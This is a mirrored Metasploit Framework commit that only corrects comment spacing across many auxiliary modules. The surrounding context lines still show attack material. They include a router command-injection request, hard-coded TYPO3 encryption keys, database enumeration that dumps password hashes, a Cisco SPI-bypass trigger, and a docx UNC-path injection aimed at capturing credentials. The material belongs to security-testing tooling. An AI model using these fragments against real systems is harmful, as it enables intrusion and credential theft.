mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
yard doc and comment corrections for auxiliary
This commit is contained in:
parent
0dd987d873
commit
4bd40fed7f
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#check to see if we get HTTP OK
|
||||
# check to see if we get HTTP OK
|
||||
if (res.code == 200)
|
||||
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
|
||||
else
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Check to verify server reported is a 2wire router
|
||||
# Check to verify server reported is a 2wire router
|
||||
if (res.headers['Server'].match(/2wire Gateway/i))
|
||||
print_status("Server is a 2wire Gateway! Grabbing info\n")
|
||||
else
|
||||
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Hardware Version: #{hardware}")
|
||||
end
|
||||
|
||||
#Check the Software Version
|
||||
# Check the Software Version
|
||||
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
|
||||
ver = $1
|
||||
print_status("Software version: #{ver}")
|
||||
|
@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
|
||||
|
||||
cmd = datastore['CMD']
|
||||
#original post request:
|
||||
#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
|
||||
#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
|
||||
# original post request:
|
||||
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
|
||||
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
|
||||
begin
|
||||
|
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Craig Heffner', #vulnerability discovery and original exploit
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
|
||||
'Craig Heffner', # vulnerability discovery and original exploit
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
end
|
||||
when 302
|
||||
#Success!
|
||||
# Success!
|
||||
return true
|
||||
else
|
||||
print_error("ERROR: received code #{res.code}")
|
||||
|
@ -100,20 +100,20 @@ class Metasploit4 < Msf::Auxiliary
|
||||
else
|
||||
print_status("Rotating through known encryption keys")
|
||||
encryption_keys = [
|
||||
#TYPO3 4.3.x - 4.4.x
|
||||
# TYPO3 4.3.x - 4.4.x
|
||||
'd696ab49a803d7816021cb1768a6917d',
|
||||
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
|
||||
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
|
||||
#TYPO3 4.4.7+
|
||||
# TYPO3 4.4.7+
|
||||
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
|
||||
#TYPO3 4.5.0
|
||||
# TYPO3 4.5.0
|
||||
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
|
||||
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
|
||||
#TYPO3 4.5.2
|
||||
# TYPO3 4.5.2
|
||||
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
|
||||
#TYPO3 4.5.3
|
||||
# TYPO3 4.5.3
|
||||
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
|
||||
#TYPO3 4.5.4 - 4.5.7
|
||||
# TYPO3 4.5.4 - 4.5.7
|
||||
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
|
||||
]
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
connect
|
||||
|
||||
#Grab the MaxDB info.
|
||||
# Grab the MaxDB info.
|
||||
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
|
||||
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
|
||||
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status(info)
|
||||
end
|
||||
|
||||
#Send our command.
|
||||
# Send our command.
|
||||
len = 39 + datastore['CMD'].length
|
||||
|
||||
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
|
||||
|
@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
|
||||
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
|
||||
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
|
||||
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
unless length == data.length
|
||||
vprint_warning("#{peer} - Inconsistent length / data packet")
|
||||
#return nil
|
||||
# return nil
|
||||
end
|
||||
|
||||
return { :length => length, :data => data }
|
||||
|
@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Version: #{sqlversion}")
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check Configuration Parameters and check what is enabled
|
||||
#---------------------------------------------------------
|
||||
# Check Configuration Parameters and check what is enabled
|
||||
print_status("Configuration Parameters:")
|
||||
if vernum.join != "2000"
|
||||
query = "SELECT name, CAST(value_in_use AS INT) from sys.configurations"
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sysconfig[l[0].strip] = l[1].to_i
|
||||
end
|
||||
else
|
||||
#enable advanced options
|
||||
# enable advanced options
|
||||
mssql_query("EXEC sp_configure \'show advanced options\', 1; RECONFIGURE")[:rows]
|
||||
query = "EXECUTE sp_configure"
|
||||
ver = mssql_query(query)[:rows]
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#checking for C2 Audit Mode
|
||||
# checking for C2 Audit Mode
|
||||
if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if xp_cmdshell is enabled
|
||||
# check if xp_cmdshell is enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['xp_cmdshell'] == 1
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if remote access is enabled
|
||||
# check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if Mail stored procedures are enabled
|
||||
# check if Mail stored procedures are enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Database Mail XPs'] == 1
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
@ -199,7 +199,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if OLE stored procedures are enabled
|
||||
# check if OLE stored procedures are enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Ole Automation Procedures'] == 1
|
||||
print_status("\tOle Automation Procedures are Enabled")
|
||||
@ -451,7 +451,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for local accounts with same username as password
|
||||
# Check for local accounts with same username as password
|
||||
sameasuser = []
|
||||
if vernum.join != "2000"
|
||||
sameasuser = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(name, password_hash\) = 1")[:rows]
|
||||
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for local accounts with empty password
|
||||
# Check for local accounts with empty password
|
||||
blankpass = []
|
||||
if vernum.join != "2000"
|
||||
blankpass = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(\'\', password_hash\) = 1")[:rows]
|
||||
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for dangerous stored procedures
|
||||
# Check for dangerous stored procedures
|
||||
fountsp = []
|
||||
dangeroussp = [
|
||||
'sp_createorphan',
|
||||
@ -732,7 +732,7 @@ EOS
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Enumerate Instances
|
||||
# Enumerate Instances
|
||||
instances =[]
|
||||
if vernum.join != "2000"
|
||||
querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
|
||||
@ -769,7 +769,7 @@ EOS
|
||||
end
|
||||
|
||||
#---------------------------------------------------------
|
||||
#Enumerate under what accounts the instance services are running under
|
||||
# Enumerate under what accounts the instance services are running under
|
||||
print_status("Default Server Instance SQL Server Service is running under the privilege of:")
|
||||
privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
|
||||
if privdflt != nil
|
||||
|
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#Parse results
|
||||
# Parse results
|
||||
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
|
||||
|
||||
if parsed_result && !parsed_result.empty?
|
||||
|
@ -53,12 +53,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def sql_statement()
|
||||
|
||||
#DEFINED HEADER TEXT
|
||||
# DEFINED HEADER TEXT
|
||||
headings = [
|
||||
["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
|
||||
]
|
||||
|
||||
#DEFINE SEARCH QUERY AS VARIABLE
|
||||
# DEFINE SEARCH QUERY AS VARIABLE
|
||||
sql = "
|
||||
-- CHECK IF VERSION IS COMPATABLE = > than 2000
|
||||
IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
|
||||
@ -341,11 +341,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
#STATUSING
|
||||
# STATUSING
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
|
||||
#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
begin
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
column_data = result[:rows]
|
||||
@ -355,14 +355,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#CREATE TABLE TO STORE SQL SERVER DATA LOOT
|
||||
# CREATE TABLE TO STORE SQL SERVER DATA LOOT
|
||||
sql_data_tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'SQL Server Data',
|
||||
'Indent' => 1,
|
||||
'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
|
||||
)
|
||||
|
||||
#STATUSING
|
||||
# STATUSING
|
||||
print_status("Attempting to retrieve data ...")
|
||||
|
||||
if (column_data.count < 7)
|
||||
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(" ")
|
||||
end
|
||||
|
||||
#SETUP ROW WIDTHS
|
||||
# SETUP ROW WIDTHS
|
||||
widths = [0, 0, 0, 0, 0, 0, 0, 0]
|
||||
(column_data|headings).each { |row|
|
||||
0.upto(7) { |col|
|
||||
@ -394,7 +394,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
}
|
||||
|
||||
#PRINT HEADERS
|
||||
# PRINT HEADERS
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
headings.each { |row|
|
||||
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
buffer2 = buffer2.chomp(",")+ "\n"
|
||||
}
|
||||
|
||||
#PRINT DIVIDERS
|
||||
# PRINT DIVIDERS
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
headings.each { |row|
|
||||
@ -417,7 +417,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(buffer1)
|
||||
}
|
||||
|
||||
#PRINT DATA
|
||||
# PRINT DATA
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
print_line("")
|
||||
@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(buffer1)
|
||||
buffer2 = buffer2.chomp(",")+ "\n"
|
||||
|
||||
#WRITE QUERY OUTPUT TO TEMP REPORT TABLE
|
||||
# WRITE QUERY OUTPUT TO TEMP REPORT TABLE
|
||||
sql_data_tbl << [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]]
|
||||
|
||||
buffer1 = ""
|
||||
@ -448,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
)
|
||||
end
|
||||
|
||||
#CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
# CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
if (save_loot=="yes")
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
|
@ -32,11 +32,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Running MySQL Enumerator...")
|
||||
print_status("Enumerating Parameters")
|
||||
#-------------------------------------------------------
|
||||
#getting all variables
|
||||
# getting all variables
|
||||
vparm = {}
|
||||
res = mysql_query("show variables") || []
|
||||
res.each do |row|
|
||||
#print_status(" | #{row.join(" | ")} |")
|
||||
# print_status(" | #{row.join(" | ")} |")
|
||||
vparm[row[0]] = row[1]
|
||||
end
|
||||
|
||||
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
query = "use mysql"
|
||||
mysql_query(query)
|
||||
|
||||
#Account Enumeration
|
||||
# Account Enumeration
|
||||
# Enumerate all accounts with their password hashes
|
||||
print_status("Enumerating Accounts:")
|
||||
query = "select user, host, password from mysql.user"
|
||||
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
result = prepare_exec(query)
|
||||
#Need this if 'cause some statements won't return anything
|
||||
# Need this if statement because some statements won't return anything
|
||||
if result
|
||||
result.each do |line|
|
||||
print_status(line)
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return if not check_dependencies
|
||||
|
||||
begin
|
||||
#Get all values from v$parameter
|
||||
# Get all values from v$parameter
|
||||
query = 'select name,value from v$parameter'
|
||||
vparm = {}
|
||||
params = prepare_exec(query)
|
||||
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status("Running Oracle Enumeration....")
|
||||
|
||||
#Version Check
|
||||
# Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
print_status("The versions of the Components are:")
|
||||
@ -64,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
)
|
||||
end
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
# Saving Major Release Number for other checks
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Audit Check
|
||||
# Audit Check
|
||||
print_status("Auditing:")
|
||||
begin
|
||||
if vparm["audit_trail"] == "NONE"
|
||||
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Security Settings
|
||||
# Security Settings
|
||||
print_status("Security Settings:")
|
||||
begin
|
||||
|
||||
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Password Policy
|
||||
# Password Policy
|
||||
print_status("Password Policy:")
|
||||
begin
|
||||
query = %Q|
|
||||
|
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#check if our process is done using these files
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
files.each do |file|
|
||||
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@smbshare = datastore['SMBSHARE']
|
||||
# Try and connect
|
||||
if connect
|
||||
#Try and authenticate with given credentials
|
||||
# Try and authenticate with given credentials
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
|
@ -64,10 +64,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n = 0
|
||||
c = 0
|
||||
|
||||
#puts "body is #{res.body.length} bytes"
|
||||
# puts "body is #{res.body.length} bytes"
|
||||
infos = res.body.split(/\r?\n/)
|
||||
infos.each do |row|
|
||||
#puts row.inspect
|
||||
# puts row.inspect
|
||||
if (c < 6)
|
||||
if (row.match(/\["file"\]=>/))
|
||||
c+=1
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@formats = Set.new
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
hash_list = hash_file
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
|
||||
|
@ -49,29 +49,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bnatmac = arp2(bnatip,outint)
|
||||
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
|
||||
|
||||
#Create Interface Specific Configs
|
||||
# Create Interface Specific Configs
|
||||
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
|
||||
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
|
||||
|
||||
#Set Captures for Traffic coming from Outside and from Inside respectively
|
||||
# Set Captures for Traffic coming from Outside and from Inside respectively
|
||||
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
|
||||
print_line("Now listening on #{outint}...")
|
||||
|
||||
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
|
||||
print_line("Now listening on #{inint}...\n\n")
|
||||
|
||||
#Start Thread from Outside Processing
|
||||
# Start Thread from Outside Processing
|
||||
fromout = Thread.new do
|
||||
loop do
|
||||
outpcap.stream.each do |pkt|
|
||||
packet = PacketFu::Packet.parse(pkt)
|
||||
|
||||
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
# Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
|
||||
shell_pkt.ip_daddr = clientip
|
||||
shell_pkt.recalc
|
||||
|
||||
#Mangle Received Packet and Drop on the Wire
|
||||
# Mangle Received Packet and Drop on the Wire
|
||||
packet.ip_saddr = serverip
|
||||
packet.ip_daddr = clientip
|
||||
packet.eth_saddr = shell_pkt.eth_saddr
|
||||
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Start Thread from Inside Processing
|
||||
# Start Thread from Inside Processing
|
||||
fromin = Thread.new do
|
||||
loop do
|
||||
inpcap.stream.each do |pkt|
|
||||
@ -98,19 +98,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet.eth_daddr = bnatmac
|
||||
end
|
||||
|
||||
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
# Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
|
||||
shell_pkt.ip_daddr = serverip
|
||||
shell_pkt.recalc
|
||||
|
||||
#Mangle Received Packet and Drop on the Wire
|
||||
# Mangle Received Packet and Drop on the Wire
|
||||
packet.eth_saddr = shell_pkt.eth_saddr
|
||||
packet.ip_saddr=shell_pkt.ip_saddr
|
||||
packet.recalc
|
||||
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
|
||||
inj.a2w(:array => [packet.to_s])
|
||||
|
||||
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
|
||||
# Trigger Cisco SPI Vulnerability by Double-tapping the SYN
|
||||
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
|
||||
select(nil, nil, nil, 0.75)
|
||||
inj.a2w(:array => [packet.to_s])
|
||||
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
|
||||
# here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
|
||||
def make_new_file
|
||||
metadata_file_data = ""
|
||||
metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
|
||||
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
|
||||
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
|
||||
|
||||
#where to find the skeleton files required for creating an empty document
|
||||
# where to find the skeleton files required for creating an empty document
|
||||
data_dir = File.join(Msf::Config.data_directory, "exploits", "docx")
|
||||
|
||||
zip_data = {}
|
||||
|
||||
#add skeleton files
|
||||
# add skeleton files
|
||||
vprint_status("Adding skeleton files from #{data_dir}")
|
||||
Dir["#{data_dir}/**/**"].each do |file|
|
||||
if not File.directory?(file)
|
||||
@ -78,19 +78,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#add on-the-fly created documents
|
||||
# add on-the-fly created documents
|
||||
vprint_status("Adding injected files")
|
||||
zip_data["docProps/core.xml"] = metadata_file_data
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
|
||||
#add the otherwise skipped "hidden" file
|
||||
# add the otherwise skipped "hidden" file
|
||||
file = "#{data_dir}/_rels/.rels"
|
||||
zip_data[file.sub(data_dir,'')] = File.read(file)
|
||||
#and lets create the file
|
||||
# and lets create the file
|
||||
zip_docx(zip_data)
|
||||
end
|
||||
|
||||
#here we inject an UNC path into an existing file, and store the injected file in FILENAME
|
||||
# here we inject an UNC path into an existing file, and store the injected file in FILENAME
|
||||
def manipulate_file
|
||||
ref = "<w:attachedTemplate r:id=\"rId1\"/>"
|
||||
|
||||
@ -99,24 +99,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#lets extract our docx and store it in memory
|
||||
# lets extract our docx and store it in memory
|
||||
zip_data = unzip_docx
|
||||
|
||||
#file to check for reference file we need
|
||||
# file to check for reference file we need
|
||||
file_content = zip_data["word/settings.xml"]
|
||||
if file_content.nil?
|
||||
print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
|
||||
return nil
|
||||
end
|
||||
|
||||
#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
|
||||
# if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
|
||||
if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
|
||||
vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
# lets zip the end result
|
||||
zip_docx(zip_data)
|
||||
else
|
||||
#now insert the reference to the file that will enable our malicious entry
|
||||
# now insert the reference to the file that will enable our malicious entry
|
||||
insert_one = file_content.index("<w:defaultTabStop")
|
||||
|
||||
if insert_one.nil?
|
||||
@ -135,16 +135,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#update the files that contain the injection and reference
|
||||
# update the files that contain the injection and reference
|
||||
zip_data["word/settings.xml"] = file_content
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
#lets zip the file
|
||||
# lets zip the file
|
||||
zip_docx(zip_data)
|
||||
end
|
||||
return 0
|
||||
end
|
||||
|
||||
#making the actual docx from the hash
|
||||
# making the actual docx from the hash
|
||||
def zip_docx(zip_data)
|
||||
docx = Rex::Zip::Archive.new
|
||||
zip_data.each_pair do |k,v|
|
||||
@ -153,11 +153,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
file_create(docx.pack)
|
||||
end
|
||||
|
||||
#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
|
||||
# unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
|
||||
def unzip_docx
|
||||
#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
|
||||
# Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
|
||||
vprint_status("Extracting #{datastore['SOURCE']} into memory.")
|
||||
#we read it all into memory
|
||||
# we read it all into memory
|
||||
zip_data = Hash.new
|
||||
begin
|
||||
Zip::File.open(datastore['SOURCE']) do |filezip|
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def run
|
||||
#we need this in make_new_file and manipulate_file
|
||||
# we need this in make_new_file and manipulate_file
|
||||
@rels_file_data = ""
|
||||
@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
|
||||
@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
|
||||
@ -182,11 +182,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
|
||||
|
||||
if "#{datastore['SOURCE']}" == ""
|
||||
#make an empty file
|
||||
# make an empty file
|
||||
print_status("Creating empty document that points to #{datastore['LHOST']}.")
|
||||
make_new_file
|
||||
else
|
||||
#extract the word/settings.xml and edit in the reference we need
|
||||
# extract the word/settings.xml and edit in the reference we need
|
||||
print_status("Injecting UNC path into existing document.")
|
||||
if manipulate_file.nil?
|
||||
print_error("Failed to create a document from #{datastore['SOURCE']}.")
|
||||
|
@ -58,8 +58,8 @@ class Metasploit4 < Msf::Auxiliary
|
